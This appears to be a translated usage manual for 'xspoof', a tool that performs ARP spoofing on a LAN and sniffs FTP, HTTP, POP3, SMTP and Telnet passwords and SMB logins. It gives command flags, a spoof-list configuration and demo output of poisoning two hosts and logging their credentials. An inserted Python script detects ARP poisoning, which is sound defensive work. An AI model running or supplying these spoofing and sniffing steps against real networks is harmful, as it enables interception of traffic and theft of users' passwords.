1. Command-line parameters
-l: list the local network interfaces
-f: enumerate the IP-MAC pairs of every host on the LAN (requires "-i" to select the correct network interface)
-i <if_number>: select the network interface
-p <pass_log_file> [smb_log_file]: sniff FTP/HTTP/POP3/SMTP passwords and TELNET session contents and record them to pass_log_file. If smb_log_file is also given, the packets on ports 139/445 that belong to SMB/CIFS login authentication and share access are recorded to smb_log_file as well (libpcap/tcpdump-compatible format)
-s: start ARP spoofing (requires "-i" to select the correct network interface)
-r: restore the ARP tables of the spoofed hosts (requires "-i" to select the correct network interface)
-c <config_file>: read the default service ports and the ARP spoofing list from a configuration file; the default file name is "xspoof.ini"
2. Operation steps
1) Use "-l" to view the local network interfaces.
2) Use "-f" to obtain the IP-MAC pairs of every host on the LAN.
3) Use "-s" to start ARP spoofing, optionally together with "-p" to sniff passwords. The correct network interface must be selected with "-i" and the configuration file name given with "-c".
4. Meaning of the configuration-file fields
#================================================
# Default port of each service (used for password sniffing)
[SERVICE_PORT]
HTTP=80
FTP=21
SMTP=25
POP3=110
TELNET=23
#================================================
# "LOCAL_MAC" is the MAC address of the local host; the remaining entries map
# each spoofed host named in "SPOOF_LIST" to its IP and MAC address
# (obtainable with the "-f" parameter)
# Example:
# LOCAL_MAC=00-0d-88-f0-e2-1e
# 192.168.0.1=02-0d-3a-26-49-b5
# 192.168.0.2=00-0a-eb-88-cc-8e
# 192.168.0.3=00-0d-88-f0-e2-1e
# 192.168.0.4=00-0b-b8-a0-32-0c
[MAC_LIST]
LOCAL_MAC=
#================================================
# ARP spoofing list; each rule is a one-way spoofing rule
# Suppose A and B are normal hosts on the LAN and C is the sniffing host
# The original packet path is A->B; after spoofing it becomes A->C->B
# To sniff the traffic in both directions between two hosts, add two rules
# Example:
# 1=192.168.0.1,192.168.0.2
# 2=192.168.0.2,192.168.0.1
# 3=192.168.0.3,192.168.0.4
# 4=192.168.0.4,192.168.0.3
[SPOOF_LIST]
An example configuration file follows:
[SERVICE_PORT]
HTTP=80
FTP=21
SMTP=25
POP3=110
TELNET=23
[MAC_LIST]
LOCAL_MAC=00-0d-88-f0-e2-1e
192.168.100.119=00-0a-eb-88-cc-8e
192.168.100.254=02-0d-3a-26-49-b5
[SPOOF_LIST]
1=192.168.100.119,192.168.100.254
2=192.168.100.254,192.168.100.119
5. Program demonstration
Command 1: xspoof -l
WinPCap version: 3, 1, 0, 24
1. \Device\NPF_GenericNdisWanAdapter (Generic NdisWan adapter)
2. \Device\NPF_{C198BDE0-2B71-465D-9340-54DB0C44BE83} (D-Link AirPlus Wireless Adapter)
   Address Family: #2
   Address Family Name: AF_INET
   Address: 192.168.100.3
   Netmask: 255.255.255.0
   Broadcast Address: 255.255.255.255
3. \Device\NPF_{C915675D-0BD7-4E77-9F7B-1669CA4FF29F} (VMware Virtual Ethernet Adapter)
   Address Family: #2
   Address Family Name: AF_INET
   Address: 192.168.236.1
   Netmask: 255.255.255.0
   Broadcast Address: 255.255.255.255
Command 2: xspoof -f -i 2
WinPCap version: 3, 1, 0, 24
[LOCAL INFORMATION]
Link type: 0
Link speed: 54000000 b/s
Broadcast: 255.255.255.255
Subnet mask: 255.255.255.0
IP address: 192.168.100.3
MAC address: 00-0d-88-f0-e2-1e
[MAC LIST]
IP: 192.168.100.3 MAC: 00-0d-88-f0-e2-1e
IP: 192.168.100.119 MAC: 00-0a-eb-88-cc-8e
IP: 192.168.100.254 MAC: 02-0d-3a-26-49-b5
260 packets received, 0 packets lost.
Command 3: xspoof -i 2 -s -p pass.log
Start sniffer thread succeed.
Listening on D-Link AirPlus Wireless Adapter...
Enable IP_ROUTER succeed.
192.168.100.119 -> M -> 192.168.100.254 ...
192.168.100.254 -> M -> 192.168.100.119 ...
Build arp packet complete, arp spoof started.
Spoofing is now in progress between 192.168.100.119 and 192.168.100.254: each side is made to believe that the MAC address of 192.168.100.3 is the real MAC address of the other side. At the same time a sniffer is started on 192.168.100.3 to capture the plaintext passwords transmitted between 192.168.100.119 and 192.168.100.254; the results are saved to the file "pass.log".
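From the defender's side, the state described above is visible on the wire as ARP replies that contradict the clean IP-MAC table and as one MAC (the sniffing host's) claiming several IPs. The following Python check is an added example, not part of xspoof or this page; it takes a constructed window of observed ARP replies (built from the addresses in the demonstration above) and a baseline table assumed to have been recorded in a clean state, and reports the three symptoms an arpwatch-style monitor would alert on.

```python
"""Detect ARP cache poisoning from a window of observed ARP replies.

Added example (not part of the xspoof page). Compares each reply against a
trusted IP->MAC baseline and reports:
  binding_changed          an IP answered with a MAC other than its baseline MAC
  ip_flip_flop             an IP was seen with more than one MAC in the window
  mac_claims_multiple_ips  one MAC answered for more than one IP in the window
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ArpReply:
    """One observed ARP reply: sender_ip 'is-at' sender_mac."""
    sender_ip: str
    sender_mac: str


def normalize_mac(mac: str) -> str:
    """Canonical form (lowercase, '-' separators) so 00:0D:88.. equals 00-0d-88.."""
    return mac.strip().lower().replace(":", "-")


# Constructed baseline: the clean IP-MAC table from the "-f" output above.
# It must come from a known-clean state or a static inventory, never from a
# scan taken while poisoning is already in progress.
BASELINE: Dict[str, str] = {
    "192.168.100.3": "00-0d-88-f0-e2-1e",
    "192.168.100.119": "00-0a-eb-88-cc-8e",
    "192.168.100.254": "02-0d-3a-26-49-b5",
}


def analyze_arp_replies(replies: Iterable[ArpReply],
                        baseline: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return sorted, de-duplicated alerts as (alert_type, subject, detail).

    Poisoned replies are normally re-sent periodically, so alerts are kept in a
    set to avoid one line per repetition.
    """
    macs_by_ip: Dict[str, set] = defaultdict(set)
    ips_by_mac: Dict[str, set] = defaultdict(set)
    alerts = set()
    norm_baseline = {ip: normalize_mac(m) for ip, m in baseline.items()}

    for r in replies:
        mac = normalize_mac(r.sender_mac)
        macs_by_ip[r.sender_ip].add(mac)
        ips_by_mac[mac].add(r.sender_ip)
        expected = norm_baseline.get(r.sender_ip)
        if expected is not None and expected != mac:
            alerts.add(("binding_changed", r.sender_ip, mac))

    for ip, macs in macs_by_ip.items():
        if len(macs) > 1:
            alerts.add(("ip_flip_flop", ip, ",".join(sorted(macs))))
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.add(("mac_claims_multiple_ips", mac, ",".join(sorted(ips))))
    return sorted(alerts)


# Constructed sample window: legitimate replies from all three hosts, then the
# two one-way poisoned replies the page's SPOOF_LIST example produces (each
# host is told that the other's IP is at the sniffing host's MAC), one repeated.
SAMPLE_REPLIES = [
    ArpReply("192.168.100.3", "00-0d-88-f0-e2-1e"),
    ArpReply("192.168.100.119", "00-0a-eb-88-cc-8e"),
    ArpReply("192.168.100.254", "02-0d-3a-26-49-b5"),
    ArpReply("192.168.100.254", "00-0D-88-F0-E2-1E"),  # poisoned, seen by .119
    ArpReply("192.168.100.119", "00:0d:88:f0:e2:1e"),  # poisoned, seen by .254
    ArpReply("192.168.100.254", "00-0d-88-f0-e2-1e"),  # periodic re-send
]

if __name__ == "__main__":
    for alert in analyze_arp_replies(SAMPLE_REPLIES, BASELINE):
        print(*alert)
```

On the sample window the check reports a changed binding for both 192.168.100.119 and 192.168.100.254, a flip-flop for each of them, and 00-0d-88-f0-e2-1e claiming all three IPs. The mac_claims_multiple_ips rule is the one that survives even without a baseline, which is why it is worth running on a switch's SPAN port or from a passive sensor; a legitimate exception is a router or proxy-ARP host, which should be whitelisted rather than alerted on.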
Command 4: xspoof -i 2 -r
WinPCap version: 3, 1, 0, 24
Send to 192.168.100.119: MAC of 192.168.100.254 is 02-0d-3a-26-49-b5
Send to 192.168.100.254: MAC of 192.168.100.119 is 00-0a-eb-88-cc-8e
Build arp packet complete.
Restore the arp table of target complete.